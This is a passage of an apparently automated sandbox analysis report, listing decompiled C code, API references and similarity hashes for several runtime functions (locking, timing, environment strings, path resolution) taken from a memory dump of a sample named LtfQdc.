										if(__eflags == 0) {
											goto L28;
										} else {
											L00CE5B20(0xffffffff);
											_t133 = _t133 + 4;
											_t102 = _v2072;
											goto L22;
										}
									}
								}
							}
						}
					} else {
						return _t58;
					}
				}
				 *((intOrPtr*)(0xd53ed8 + _t58 * 4)) = 1;
				_t60 = _t93 * 4;
				 *((intOrPtr*)(_t60 + 0xd53edc + _t60 * 2)) = _a4;
				 *0xd53ed4 = _t93;
				 *_t123 = _t93;
				_t58 =  *(_t60 + 0xd53ee0 + _t60 * 2);
				_t123[1] = _t58;
				goto L10;
			}

0x00cd7220
0x00cd7220
0x00cd7223
0x00cd7226
0x00cd7228
0x00cd7230
0x00cd723d
0x00cd723d
0x00cd7242
0x00cd7247
0x00cd724d
0x00cd725d
0x00cd72f2
0x00cd72f7
0x00cd72fa
0x00cd7301
0x00cd7307
0x00cd7309
0x00cd7315
0x00cd731a
0x00cd7325
0x00cd732a
0x00cd732a
0x00cd7301
0x00cd7263
0x00cd726a
0x00cd7272
0x00cd72e6
0x00cd72e6
0x00cd727a
0x00cd727b
0x00cd7280
0x00cd7283
0x00cd7286
0x00cd7291
0x00000000
0x00000000
0x00cd7293
0x00cd729a
0x00000000
0x00000000
0x00cd729c
0x00cd72ce
0x00cd72cf
0x00cd72db
0x00cd7332
0x00cd7333
0x00cd7335
0x00cd7336
0x00cd7337
0x00cd7338
0x00cd7339
0x00cd733a
0x00cd733b
0x00cd733c
0x00cd733d
0x00cd733e
0x00cd733f
0x00cd7341
0x00cd7343
0x00cd7344
0x00cd7345
0x00cd734b
0x00cd7352
0x00cd7355
0x00cd735f
0x00cd7365
0x00cd736b
0x00cd736e
0x00cd73e4
0x00cd73e5
0x00cd73eb
0x00cd73ed
0x00cd7462
0x00cd7463
0x00000000
0x00cd73ef
0x00cd73ef
0x00cd73fd
0x00cd7412
0x00cd7427
0x00cd7430
0x00cd7444
0x00cd744f
0x00cd7451
0x00cd7461
0x00cd7461
0x00cd7370
0x00cd7370
0x00cd7377
0x00cd737c
0x00cd737f
0x00cd7381
0x00cd7465
0x00cd7465
0x00cd7466
0x00000000
0x00cd7387
0x00cd7387
0x00cd738d
0x00cd7390
0x00cd73c0
0x00cd73c5
0x00cd73cd
0x00cd73d0
0x00cd73d5
0x00cd73d8
0x00cd73de
0x00cd73de
0x00000000
0x00cd7392
0x00cd7393
0x00cd7398
0x00cd739b
0x00cd739d
0x00cd7468
0x00cd7468
0x00cd7469
0x00cd746b
0x00cd746c
0x00cd746d
0x00cd746e
0x00cd746f
0x00cd7470
0x00cd7473
0x00cd7474
0x00cd7475
0x00cd7477
0x00cd747c
0x00cd7482
0x00cd7489
0x00cd748c
0x00cd7492
0x00cd74f0
0x00cd74f8
0x00cd74ff
0x00cd7501
0x00cd7503
0x00cd750f
0x00cd7514
0x00cd751f
0x00cd7524
0x00cd74ff
0x00cd7494
0x00cd749b
0x00cd74a1
0x00cd74a3
0x00cd74e4
0x00cd74e4
0x00cd74aa
0x00cd74ba
0x00cd74c7
0x00cd74ca
0x00cd74ca
0x00cd74ca
0x00cd74d2
0x00cd74d8
0x00cd74e1
0x00cd73a3
0x00cd73a3
0x00cd73aa
0x00000000
0x00cd73b0
0x00cd73b2
0x00cd73b7
0x00cd73ba
0x00000000
0x00cd73ba
0x00cd73aa
0x00cd739d
0x00cd7390
0x00cd7381
0x00cd72dd
0x00cd72e1
0x00cd72e1
0x00cd72db
0x00cd72a5
0x00cd72ab
0x00cd72b5
0x00cd72bc
0x00cd72c2
0x00cd72c4
0x00cd72cb
0x00000000

APIs

TlsGetValue.KERNEL32(FFFFFFFF,00D560EC,?,?,?,00CD75BC,00CEC5A5,00D560EC,?,00CEC5A5,00000000,?), ref: 00CD7233
TryAcquireSRWLockExclusive.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00CC9DF6), ref: 00CD726A
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00CC9DF6), ref: 00CD72CF
__Init_thread_header.LIBCMT ref: 00CD72F2

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireInit_thread_headerReleaseValue
String ID:
API String ID: 1978092767-0
Opcode ID: 90df56b651fbf0849c3cafafb95897abfce8113ab28b0f48bb77c1180e149de7
Instruction ID: 1b2104375733d8ee7eb296420e3353a964e1d5f7cb513d8c883e8e8c05fe3d2c
Opcode Fuzzy Hash: 90df56b651fbf0849c3cafafb95897abfce8113ab28b0f48bb77c1180e149de7
Instruction Fuzzy Hash: CD21F371A04340CFD714DF28E885A6973A2FB41365F14022FFA51C73A1EB719A95DB22

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9850 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CC9850(intOrPtr* _a4) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				union _LARGE_INTEGER _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t56;
				intOrPtr _t63;
				signed int _t74;
				signed int _t79;
				signed int _t80;
				intOrPtr* _t81;
				signed int _t87;

				_t81 = _a4;
				_t42 =  *0xd40014; // 0xfbddd969
				_v24 = _t42 ^ _t87;
				_v28 = 0;
				_v32.LowPart = 0;
				QueryPerformanceCounter( &_v32);
				_t80 = _v32.LowPart;
				_t61 = _v28;
				asm("sbb eax, ebx");
				if(0x7bd05af6 < _t80) {
					_t48 =  *0xd51340; // 0x0
					_v48 = _t48;
					_t63 =  *0xd51344; // 0x0
					_v44 = _t63;
					_t49 = L00D1BF10(_t80, _t61, _t48, _t63);
					_v68 = _t61;
					_v56 = _t49 * _v64;
					_v52 = _t74 * 0xf4240;
					_t80 = _t80 - _v56;
					_t61 = _v68;
					asm("sbb ebx, esi");
					_v68 = _t49 * 0xf4240;
					_t79 = (_t80 * 0xf4240 >> 0x20) + _v68 * 0xf4240;
					_t56 = L00D1BF10(_t80 * 0xf4240, _t79, _v64, _v60) + _v84;
					asm("adc edx, esi");
					_t81 = _a4;
				} else {
					_t79 = _t80 * 0xf4240 >> 0x20;
					_t56 = L00D1BF10(_t80 * 0xf4240, _t61 * 0xf4240 + _t79,  *0xd51340,  *0xd51344);
				}
				 *_t81 = _t56;
				 *(_t81 + 4) = _t79;
				E00CFE643(_t56, _t61, _v24 ^ _t87, _t79, _t80, _t81);
				return _t81;
			}

0x00cc985c
0x00cc985f
0x00cc9866
0x00cc986a
0x00cc9872
0x00cc987f
0x00cc9885
0x00cc9889
0x00cc9899
0x00cc989b
0x00cc98c6
0x00cc98cb
0x00cc98cf
0x00cc98d5
0x00cc98dd
0x00cc98e6
0x00cc98f0
0x00cc9903
0x00cc990c
0x00cc9910
0x00cc9914
0x00cc991d
0x00cc9931
0x00cc9942
0x00cc9946
0x00cc9948
0x00cc989d
0x00cc98a4
0x00cc98bc
0x00cc98bc
0x00cc994b
0x00cc994d
0x00cc9956
0x00cc9964

APIs

QueryPerformanceCounter.KERNEL32(00000000), ref: 00CC987F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC98BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC98DD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC993D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
String ID:
API String ID: 374826692-0
Opcode ID: 9334953be9d138d279771235538bc80952f6da239677be4e6dbab092eabb4c33
Instruction ID: 14a765bc18a90a5a5a4a36ce1fca2a897184cbbd7abdb2a6b9c363bd77996269
Opcode Fuzzy Hash: 9334953be9d138d279771235538bc80952f6da239677be4e6dbab092eabb4c33
Instruction Fuzzy Hash: 6D317275A04304AFC708DF18D95566BFBE8EBC8710F04892EF988D7361D774AC049BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D1C071 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00D1C071() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E00D1C15F(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = L00D1BFBA(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t26 = E00CC2990(_t9);
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(L00D1BFBA() != 0) {
								E00CC29E0(0);
								_t19 = _t26;
							} else {
								E00CC29E0(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E00CC29E0();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}

0x00d1c077
0x00d1c079
0x00d1c07f
0x00d1c083
0x00d1c08b
0x00d1c090
0x00d1c09e
0x00d1c0a1
0x00d1c0a9
0x00d1c0ae
0x00d1c0c2
0x00d1c0c5
0x00d1c0c8
0x00d1c0db
0x00d1c0dc
0x00d1c0df
0x00d1c0e0
0x00d1c0e3
0x00d1c0e4
0x00d1c0e5
0x00d1c0f0
0x00d1c0fb
0x00d1c100
0x00d1c0f2
0x00d1c0f3
0x00d1c0f3
0x00d1c104
0x00d1c10a
0x00d1c0ca
0x00d1c0ca
0x00d1c0d1
0x00d1c0d7
0x00d1c0d7
0x00d1c0b0
0x00d1c0b1
0x00d1c0b7
0x00d1c0b7
0x00d1c10d
0x00d1c110

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00D1C079

Part of subcall function 00D1BFBA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00D15525,?,00000000,-00000008), ref: 00D1C066

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1C0B1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1C0D1

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 89abe2e12acf3c52334712ec13d5788bce5827e2476e7fabd633983389f8f45c
Instruction ID: cb7ae3a9ee89fa848e8a0fa6c5bea11985295d50a0671c6eca1a039cd7471ff5
Opcode Fuzzy Hash: 89abe2e12acf3c52334712ec13d5788bce5827e2476e7fabd633983389f8f45c
Instruction Fuzzy Hash: 4D1122B1551B15BF672167B1AC8ACFF6EADDF893A4714042AF502E1202FF70CD8096B1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE02F0 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CE02F0(void* __eax, intOrPtr* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				void* __ebx;
				void* _t15;
				void* _t23;
				intOrPtr* _t25;
				intOrPtr* _t26;
				intOrPtr _t39;
				intOrPtr* _t42;

				_t50 = __fp0;
				_t38 = __edx;
				_t15 = __eax;
				_t42 = __ecx;
				 *__ecx = 0xd2f228;
				_t39 = __ecx + 0x1c;
				__imp__TryAcquireSRWLockExclusive(_t39, __eax);
				if(__eax == 0) {
					_t15 = L00CC8CF0(_t23, _t39, __edx, __eflags, __fp0);
				}
				_t24 =  *((intOrPtr*)(_t42 + 0x20));
				__imp__ReleaseSRWLockExclusive(_t39);
				if( *((intOrPtr*)(_t42 + 0x20)) != 0) {
					_t15 = L00CEEF00(_t15, _t24, _t24);
				}
				__imp__TryAcquireSRWLockExclusive(_t39);
				if(_t15 == 0) {
					_t15 = L00CC8CF0(_t24, _t39, _t38, __eflags, _t50);
				}
				_t25 =  *((intOrPtr*)(_t42 + 0x20));
				 *((intOrPtr*)(_t42 + 0x20)) = 0;
				_v20 = _t39;
				if(_t25 != 0) {
					 *0xd57000();
					_t15 =  *((intOrPtr*)( *((intOrPtr*)( *_t25 + 4))))(1);
					_t39 = _v20;
				}
				 *0xd54be4 = 0;
				__imp__ReleaseSRWLockExclusive(_t39);
				_t26 =  *((intOrPtr*)(_t42 + 0x20));
				 *((intOrPtr*)(_t42 + 0x20)) = 0;
				if(_t26 != 0) {
					 *0xd57000();
					_t15 =  *((intOrPtr*)( *((intOrPtr*)( *_t26 + 4))))(1);
					_t39 = _v20;
				}
				E00C90790(_t15);
				E00CC5340(_t42 + 0x14);
				return E00CE0690(_t42 + 8, _t38,  *((intOrPtr*)(_t42 + 0xc)));
			}

0x00ce02f0
0x00ce02f0
0x00ce02f0
0x00ce02f7
0x00ce02f9
0x00ce02ff
0x00ce0303
0x00ce030b
0x00ce03b5
0x00ce03b5
0x00ce0311
0x00ce0315
0x00ce031d
0x00ce0321
0x00ce0321
0x00ce0327
0x00ce032f
0x00ce03c1
0x00ce03c1
0x00ce0335
0x00ce0338
0x00ce0341
0x00ce0344
0x00ce034d
0x00ce0357
0x00ce0359
0x00ce0359
0x00ce035c
0x00ce0367
0x00ce036d
0x00ce0370
0x00ce0379
0x00ce0382
0x00ce038c
0x00ce038e
0x00ce038e
0x00ce0393
0x00ce039b
0x00ce03b2

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CE0303
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CE0315
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CE0327
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CE0367

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-0
Opcode ID: a82f47df48b35fff52d64210b824ade7952969dc72ec54fcbf53f7caf018433e
Instruction ID: 7a9e93525be54fc003dd1a08919301ea659f611ab0d30c3e6b66629464215922
Opcode Fuzzy Hash: a82f47df48b35fff52d64210b824ade7952969dc72ec54fcbf53f7caf018433e
Instruction Fuzzy Hash: A92181352007008FDB10AF66D884B7EB7B5BF88714F28051DE94697361DFB4AC46DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CDF920 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CDF920(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4) {
				signed int _v12;
				char _v20;
				void* __esi;
				signed int _t14;
				intOrPtr _t18;
				intOrPtr _t22;
				void* _t27;
				signed int _t28;
				signed int _t30;
				void* _t39;
				intOrPtr _t40;
				intOrPtr* _t41;
				signed int _t42;
				void* _t43;
				void* _t51;

				_t51 = __fp0;
				_t39 = __edi;
				_t27 = __ebx;
				_t14 =  *0xd40014; // 0xfbddd969
				_v12 = _t14 ^ _t42;
				_t16 =  *0xd54bd8;
				_t28 =  *0xd43e38; // 0x0
				if( *0xd54bd8 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t28 * 4)) + 4))) {
					L00CFDC67(_t16, 0xd54bd8);
					_t43 = _t43 + 4;
					__eflags =  *0xd54bd8 - 0xffffffff;
					if(__eflags == 0) {
						 *0xd54bd0 = 0;
						 *0xd54bd4 = 0;
						 *0xd54bcc = 0xd54bd0;
						L00CFDCDD(0xd54bd8);
						_t43 = _t43 + 4;
					}
				}
				_t18 =  *0xd54be0;
				_t30 =  *0xd43e38; // 0x0
				_t38 =  *[fs:0x2c];
				if(_t18 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t30 * 4)) + 4))) {
					_t18 = L00CFDC67(_t18, 0xd54be0);
					__eflags =  *0xd54be0 - 0xffffffff;
					if(__eflags == 0) {
						L00CC8CE0(0xd54bdc);
						_t18 = L00CFDCDD(0xd54be0);
					}
				}
				_t40 = _a4;
				__imp__TryAcquireSRWLockExclusive(0xd54bdc);
				_t48 = _t18;
				if(_t18 == 0) {
					L00CC8CF0(_t27, 0xd54bdc, _t38, __eflags, _t51);
				}
				E00C98AF0(0xd54bcc, _t48,  &_v20, _t40, _t40);
				_t22 = _v20;
				_t41 = _t22 + 0x10;
				if( *((char*)(_t22 + 0x1b)) < 0) {
					_t41 =  *_t41;
				}
				__imp__ReleaseSRWLockExclusive();
				E00CFE643(_t22, _t27, _v12 ^ _t42, _t38, _t39, _t41, 0xd54bdc);
				return _t41;
			}

0x00cdf920
0x00cdf920
0x00cdf920
0x00cdf927
0x00cdf92e
0x00cdf931
0x00cdf936
0x00cdf94c
0x00cdf9cd
0x00cdf9d2
0x00cdf9d5
0x00cdf9dc
0x00cdf9e2
0x00cdf9ec
0x00cdf9f6
0x00cdfa05
0x00cdfa0a
0x00cdfa0a
0x00cdf9dc
0x00cdf94e
0x00cdf953
0x00cdf959
0x00cdf969
0x00cdfa17
0x00cdfa1f
0x00cdfa26
0x00cdfa31
0x00cdfa3b
0x00cdfa40
0x00cdfa26
0x00cdf96f
0x00cdf977
0x00cdf97d
0x00cdf97f
0x00cdf9c1
0x00cdf9c1
0x00cdf98c
0x00cdf991
0x00cdf994
0x00cdf99b
0x00cdf99d
0x00cdf99d
0x00cdf9a4
0x00cdf9af
0x00cdf9bb

APIs

TryAcquireSRWLockExclusive.KERNEL32(00D54BDC,?,?,?,00CDFB84,00000001), ref: 00CDF977
ReleaseSRWLockExclusive.KERNEL32(00D54BDC,?,00CDFB84,00CDFB84,?,?,?,00CDFB84,00000001), ref: 00CDF9A4
__Init_thread_header.LIBCMT ref: 00CDF9CD
__Init_thread_header.LIBCMT ref: 00CDFA17

Part of subcall function 00CFDC67: EnterCriticalSection.KERNEL32(00D43DF0,?,?,?,00CD5D50,00D53ED0,?,?,?,?,00CD5B17,00000000,00000000), ref: 00CFDC72
Part of subcall function 00CFDC67: LeaveCriticalSection.KERNEL32(00D43DF0,?,?,?,00CD5D50,00D53ED0,?,?,?,?,00CD5B17,00000000,00000000), ref: 00CFDCAF

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CriticalExclusiveInit_thread_headerLockSection$AcquireEnterLeaveRelease
String ID:
API String ID: 35131462-0
Opcode ID: 4ec3b01bf812fb2e858494c59cc9b928de4bc986b0369216d6030b87f233c234
Instruction ID: 7e58f3cb98130e13fdcf704a5eae916624a12c72a1c0a67d27a5f0cbf80c89d9
Opcode Fuzzy Hash: 4ec3b01bf812fb2e858494c59cc9b928de4bc986b0369216d6030b87f233c234
Instruction Fuzzy Hash: C721D3749003049FCB10EF54E8A5B6A7771BB41329F0001AAEE1697391DB71E999DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00CB75B3 Relevance: 6.1, APIs: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CB75B3(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
				void* _v16;
				signed int _v24;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t18;
				void* _t23;
				void* _t42;
				signed int _t44;
				signed int _t45;
				void* _t47;

				_t47 = (_t45 & 0xfffffff8) - 0x10;
				_t29 = _a12;
				_t13 =  *0xd40014; // 0xfbddd969
				_v24 = _t13 ^ _t44;
				asm("adc ecx, edx");
				_t42 = 0;
				_t18 = L00D1BF10(0x3b9aca00 *  *_a12 + _a12[2], _t29[1] * 0x3b9aca00 + (0x3b9aca00 *  *_t29 >> 0x20), 0x3e8, 0);
				L00C99BB0(0x3e8, _t47);
				_t28 = _t18 -  *((intOrPtr*)(_t47 + 4));
				asm("sbb edi, [eax+0x4]");
				_t23 = L00D1BF10(_t18 -  *((intOrPtr*)(_t47 + 4)), 0x3e8, 0x3e8, 0);
				asm("sbb ecx, edi");
				_t24 =  >=  ? 0 : _t23;
				__imp__SleepConditionVariableSRW(_a4, _a8, _t24, 0);
				if(_t24 == 0) {
					_t42 =  !=  ? GetLastError() : 0x8a;
				}
				E00CFE643(_t24, _t28, _v40 ^ _t44, 0x3e8, 0x3e8, _t42);
				return _t42;
			}

0x00cb75bc
0x00cb75bf
0x00cb75c2
0x00cb75c9
0x00cb75e7
0x00cb75e9
0x00cb75f4
0x00cb7600
0x00cb760a
0x00cb760c
0x00cb7618
0x00cb7629
0x00cb762b
0x00cb7636
0x00cb763e
0x00cb7650
0x00cb7650
0x00cb7659
0x00cb7667

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB75F4

Part of subcall function 00C99BB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C99C13

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB7618
SleepConditionVariableSRW.KERNEL32(3B9ACA00,59682F00,00000000,00000000,00000000,?,000003E8,00000000,00000000,0000E941,59682F00,3B9ACA00,00000000), ref: 00CB7636
GetLastError.KERNEL32 ref: 00CB7640

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ConditionErrorLastSleepVariable
String ID:
API String ID: 4155066533-0
Opcode ID: e3e9848adac06bdf1c331618481b326b5c9ddcc17cdc08e3c20c52e323959ead
Instruction ID: 113122258703969550dfb6d01063131d12e7c48b321155b91c00859777837ac8
Opcode Fuzzy Hash: e3e9848adac06bdf1c331618481b326b5c9ddcc17cdc08e3c20c52e323959ead
Instruction Fuzzy Hash: F611C8727002146BDB149B2DDC45A6B7BADDF89764F058129F90ACB291DA31DD018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00D10588 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D10588(void* __ecx, WCHAR** _a4) {
				long _t8;
				LPWSTR* _t11;
				WCHAR** _t19;
				void* _t20;

				_t19 = _a4;
				_t20 = __ecx;
				_t2 = _t20 + 8; // 0x531dae8
				_t3 = _t20 + 0xc; // 0x4c48300
				_t8 = GetFullPathNameW( *_t19,  *_t3,  *_t2, 0);
				if(_t8 == 0) {
					L1:
					E00D0D2CD(GetLastError());
					return  *((intOrPtr*)(E00D0D2A7()));
				}
				_t4 = _t20 + 0xc; // 0x4c48300
				__eflags = _t8 -  *_t4;
				if(__eflags <= 0) {
					L5:
					 *(_t20 + 0x10) = _t8;
					__eflags = 0;
					return 0;
				}
				_t11 = E00D0A3A2(_t20, __eflags, _t8 + 1);
				__eflags = _t11;
				if(_t11 == 0) {
					_t5 = _t20 + 8; // 0x531dae8
					_t6 = _t20 + 0xc; // 0x4c48300
					_t8 = GetFullPathNameW( *_t19,  *_t6,  *_t5, _t11);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L1;
					}
					goto L5;
				}
				return _t11;
			}

0x00d1058f
0x00d10592
0x00d10596
0x00d10599
0x00d1059e
0x00d105a6
0x00d105a8
0x00d105af
0x00000000
0x00d105ba
0x00d105be
0x00d105be
0x00d105c1
0x00d105e3
0x00d105e3
0x00d105e6
0x00000000
0x00d105e6
0x00d105c7
0x00d105cc
0x00d105ce
0x00d105d1
0x00d105d4
0x00d105d9
0x00d105df
0x00d105e1
0x00000000
0x00000000
0x00000000
0x00d105e1
0x00d105eb

APIs

